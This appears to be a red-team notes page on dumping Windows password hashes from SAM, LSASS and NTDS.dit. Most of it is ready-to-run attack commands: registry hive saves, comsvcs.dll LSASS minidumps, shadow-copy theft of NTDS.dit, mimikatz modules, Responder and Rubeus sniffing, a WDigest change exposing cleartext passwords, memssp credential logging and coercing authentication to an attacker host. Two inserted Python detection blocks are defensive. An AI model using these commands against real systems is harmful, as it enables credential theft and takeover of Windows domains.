# Extract Hash & Password

## Information

<table data-header-hidden><thead><tr><th width="161"></th><th></th></tr></thead><tbody><tr><td>Database</td><td><strong>SAM</strong> (Security Account Manager)</td></tr><tr><td>Hash format</td><td><strong>LM</strong> (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total)<br><strong>NTLM</strong> (MD4)</td></tr><tr><td>Authentication protocols</td><td><strong>NTLMv1</strong> (uses LM and NTLM hashes)<br><strong>NTLMv2</strong> (uses NTLM hashes)<br><strong>Kerberos</strong></td></tr><tr><td>Process</td><td><strong>LSASS</strong> (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.<br>Implements <strong>LSA</strong> (Local Security Authority).</td></tr><tr><td>NTDS.dit</td><td>Each Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)</td></tr></tbody></table>

### SAM Hashes

To extract hashes from the SAM database we need:

* Administrator privileges
* `hklm\sam`, which contains the password hashes.
* `hklm\system`, which contains the bootkey needed to decrypt the SAM database.
* `hklm\security`, which contains cached credentials for domain accounts.

The on-disk hive files live in `C:\Windows\System32\Config\`.

{% tabs %}
{% tab title="Get File" %}
Create copies for transfer

{% code overflow="wrap" %}

```powershell
reg.exe save hklm\sam C:\sam.save
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
reg.exe save hklm\system C:\system.save
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
reg.exe save hklm\security C:\security.save
```

{% endcode %}
{% endtab %}

{% tab title="Extract" %}
Extract the hashes offline from the saved hive files.\
Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py).

{% code overflow="wrap" %}

```bash
secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL
```

{% endcode %}
{% endtab %}
{% endtabs %}

### LSASS Hashes

To extract hashes from the LSASS process we need:

* Administrator privileges
* A dump of the running process

{% tabs %}
{% tab title="Get File" %}
Create a copy for transfer

{% code overflow="wrap" %}

```
Task Manager > Right-click on LSAProcess > Create dump file
```

{% endcode %}

Or

{% code overflow="wrap" %}

```powershell
tasklist /svc
# or
Get-Process lsass
# note the PID of lsass.exe
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full
```

{% endcode %}
{% endtab %}

{% tab title="Extract" %}
Extract the hashes offline from the LSASS process dump.\
(With administrator privileges the dump can also be created from Task Manager: open the "Details" tab, find lsass.exe, right-click, and select "Create dump file".)

Use [pypykatz](https://github.com/skelsec/pypykatz).

{% code overflow="wrap" %}

```bash
pypykatz lsa minidump lsass.dump
```

{% endcode %}
{% endtab %}
{% endtabs %}
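Every dump method in this section opens a handle to lsass.exe with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess). The following detection logic is an added example, not part of the original page: it flags handle opens on lsass.exe whose access mask includes PROCESS_VM_READ, escalates when the full-access mask used by the comsvcs.dll MiniDump path or a minidump helper DLL in the call trace is seen, and skips a per-estate allowlist. The event records and the allowlist are constructed for the example.

```python
"""Flag handle opens on lsass.exe that carry dump-capable access rights.

Input records are dicts shaped like parsed Sysmon Event ID 10 events.
Sample records and the allowlist below are constructed for this example.
"""
PROCESS_VM_READ = 0x0010        # required to read (and therefore dump) memory
PROCESS_ALL_ACCESS = 0x1FFFFF   # mask requested by the comsvcs.dll MiniDump path

# Processes that legitimately read LSASS memory; tune per environment.
SOURCE_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}

# DLLs in the call trace that indicate a minidump is being written.
DUMP_HELPER_DLLS = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll")


def classify_event(event):
    """Return None for benign access, else (source_image, access_mask, severity)."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in SOURCE_ALLOWLIST:
        return None
    access = int(event.get("GrantedAccess", "0"), 16)   # Sysmon logs hex text
    if not access & PROCESS_VM_READ:
        return None   # cannot read memory, so cannot dump it
    trace = event.get("CallTrace", "").lower()
    if access == PROCESS_ALL_ACCESS or any(d in trace for d in DUMP_HELPER_DLLS):
        return (source, access, "high")
    return (source, access, "medium")


def find_lsass_access(events):
    """Run classify_event over a batch and keep only the hits, in input order."""
    return [hit for hit in (classify_event(e) for e in events) if hit]


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\comsvcs.dll+1ebf0"},
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\dumper.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2a3b1"},
    {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},
]

if __name__ == "__main__":
    for src, acc, sev in find_lsass_access(SAMPLE_EVENTS):
        print(f"{sev.upper():6} {src} GrantedAccess=0x{acc:X}")
```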

### NTDS Hashes

To extract hashes from the `NTDS.dit` file we need:

* Access to a Domain Controller
* Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights, or equivalent
* The `hklm\system` hive, which contains the bootkey needed for decryption

{% tabs %}
{% tab title="Get File" %}
Create a copy for transfer

{% code overflow="wrap" %}

```powershell
vssadmin CREATE SHADOW /For=C:
```

{% endcode %}

Or

{% code overflow="wrap" %}

```powershell
vshadow.exe -nw -p C:
# note the shadow copy device path (used as <PATH> below)
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit
```

{% endcode %}
{% endtab %}

{% tab title="Extract" %}
Extract the hashes offline from the copied `NTDS.dit` and the saved `hklm\system` hive.\
Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py).

{% code overflow="wrap" %}

```bash
secretsdump.py -ntds NTDS.dit -system system.save LOCAL
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Tools

<table><thead><tr><th width="159">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td>Remotely<br><code>nxc smb &#x3C;IP> [--local-auth] -u &#x3C;USER> -p &#x3C;PASS> --sam --lsa -M lsassy</code> <br><code>nxc smb &#x3C;IP_DC> -u &#x3C;USER> -p &#x3C;PASS> --ntds</code></td></tr><tr><td><a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a></td><td><p>On host <em>(needs SeDebugPrivilege enabled, in addition to administrator privileges)</em></p><p><code>.\mimikatz.exe</code></p><p><code>> privilege::debug</code> -> <code>token::elevate</code><br><code>> lsadump::sam</code> <br><code>> lsadump::lsa</code><br><code>> lsadump::secrets</code> <br><code>> vault::cred</code><br><code>> sekurlsa::credman</code><br><code>> sekurlsa::logonpasswords full</code> <em>(see</em> <a href="#uselogoncredential-registry-key"><em>UseLogonCredential Registry Key</em></a> <em>)</em></p><p>Guide <a href="https://adsecurity.org/?page_id=1821">HERE</a>; for all modules see <a href="https://tools.thehacker.recipes/mimikatz/modules">HERE</a>.<br>For a <a href="../../../utility/c2-and-exploitation-framework/metasploit#meterpreter">Meterpreter</a> reverse shell: <code>load kiwi</code><br>Non-interactive shell: <code>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit</code></p></td></tr><tr><td><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">impacket-secretsdump</a></td><td><code>secretsdump.py &#x3C;DOMAIN>/&#x3C;USER>:&#x3C;PASS>@&#x3C;DC></code></td></tr><tr><td><a href="https://github.com/GossiTheDog/HiveNightmare">HiveNightmare</a></td><td>Copies the SAM, SYSTEM and SECURITY hives as any user, even an unprivileged one.<br>CVE-2021-36934 - SeriousSam<br><code>.\HiveNightmare.exe</code></td></tr></tbody></table>

## Sniffing

<table><thead><tr><th width="151">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/lgandx/Responder">responder</a></td><td><mark style="color:green;">Linux</mark><br><code>sudo responder -I &#x3C;INTERFACE></code><br><code>sudo responder -I &#x3C;INTERFACE> -A</code>  <em>(passive analysis mode)</em><br><em>See</em> <code>/usr/share/responder/logs</code></td></tr><tr><td><a href="https://github.com/Kevin-Robertson/Inveigh">Inveigh</a></td><td><mark style="color:blue;">Windows</mark><br>PowerShell version (no longer maintained)<br><code>Import-Module .\Inveigh.ps1</code><br><code>Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y</code><br>C# version<br><code>.\Inveigh.exe</code><br><code>[ESC]</code> > <code>HELP</code></td></tr><tr><td><a href="https://github.com/IvAlexEv/Compiled-Binaries/blob/main/Rubeus.exe">rubeus</a></td><td><p><mark style="color:blue;">Windows</mark> (sniffs TGTs and TGSs, useful for service accounts)<br><em>Requires elevated privileges</em><br><code>Rubeus.exe monitor /interval:1 /nowrap</code><br>Save the output in a file "ticket.bs4.kirbi", then<br><code>cat ticket.bs4.kirbi | base64 -d > ticket.kirbi</code></p><p><code>ticketConverter.py ticket.kirbi user.ccache</code></p></td></tr></tbody></table>

If we have access to the target, we can make it authenticate to the listener with `net use \\<IP_Attacker>\share`.

## Other

### UseLogonCredential Registry Key

The WDigest `UseLogonCredential` registry value must be set to 1 before cleartext passwords can be recovered from LSASS.

{% code overflow="wrap" %}

```powershell
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
```

{% endcode %}

Then reboot:

```powershell
shutdown /r /t 0 /f
```
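The hive saves in the SAM section, the shadow copy and `NTDS.dit` copy in the NTDS section, and the `reg add` above all leave a process-creation record (Security Event 4688 with command-line auditing, or Sysmon Event ID 1). The rules below are an added example, not part of the original page: they match those command lines and correlate, per user, a shadow copy followed by an `NTDS.dit` copy as the complete offline-dump chain. The process records, user names and the shadow copy device path are constructed for the example.

```python
"""Match credential-dump command lines and correlate them per user.

Records are dicts shaped like parsed process-creation events; the sample
records below are constructed for this example, not real telemetry.
"""
import re

RULES = [
    # reg.exe save hklm\sam|system|security <file>
    ("hive_save", re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b", re.I)),
    # vssadmin create shadow ... or vshadow -p ...
    ("shadow_copy", re.compile(r"\b(?:vssadmin(?:\.exe)?\s+create\s+shadow|vshadow(?:\.exe)?\s+.*-p\b)", re.I)),
    # any reference to the AD database file
    ("ntds_copy", re.compile(r"ntds\.dit", re.I)),
    # WDigest UseLogonCredential set to 1
    ("wdigest_cleartext", re.compile(r"wdigest.*\buselogoncredential\b.*/d\s+1\b", re.I)),
]


def match_rules(cmdline):
    """Return the names of every rule the command line trips."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(records):
    """Group rule hits per user; escalate users whose hits form the NTDS chain."""
    per_user = {}
    for rec in records:
        hits = match_rules(rec["CommandLine"])
        if hits:
            per_user.setdefault(rec["User"], set()).update(hits)
    escalated = {u for u, h in per_user.items() if {"shadow_copy", "ntds_copy"} <= h}
    return per_user, escalated


SAMPLE_PROCESSES = [  # constructed records
    {"User": r"CORP\alice", "CommandLine": r"reg.exe save hklm\sam C:\sam.save"},
    {"User": r"CORP\alice", "CommandLine": r"vssadmin CREATE SHADOW /For=C:"},
    {"User": r"CORP\alice", "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\NTDS.dit"},
    {"User": r"CORP\bob", "CommandLine": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1"},
    {"User": r"CORP\bob", "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
]

if __name__ == "__main__":
    per_user, escalated = triage(SAMPLE_PROCESSES)
    for user, hits in per_user.items():
        flag = "ESCALATE" if user in escalated else "review"
        print(f"{flag:8} {user}: {', '.join(sorted(hits))}")
```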

### Store Password using Reversible Encryption

When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent.\
Tools such as [impacket-secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as [DCSync](https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/dc-synchronization).

Enumeration

{% code overflow="wrap" %}

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

{% endcode %}

With PowerView ([Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```

{% endcode %}

### [Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/how-it-works)

When enabled, the *Local Security Authority (LSASS)* environment runs as a trustlet in VTL1 ([VSM](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) Secure Mode) named *LSAISO.exe (LSA Isolated)* and communicates with the **LSASS.exe** process running in VTL0 ([VSM](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) Normal Mode) through an RPC channel. This means that the credential data held by LSASS.exe is encrypted.

Credential Guard is designed to protect only non-local (domain) users.

{% code overflow="wrap" %}

```powershell
Get-ComputerInfo
# CredentialGuard in DeviceGuardSecurityServicesConfigured DeviceGuardSecurityServicesRunning
```

{% endcode %}

With [mimikatz](https://github.com/gentilkiwi/mimikatz)

{% code overflow="wrap" %}

```powershell
privilege::debug
misc::memssp
# OUTPUT IN C:\Windows\System32\mimilsa.log
```

{% endcode %}

Now we can be patient and wait for another user to remotely connect to the machine or we can resort to additional techniques such as social engineering to coerce someone to log in.
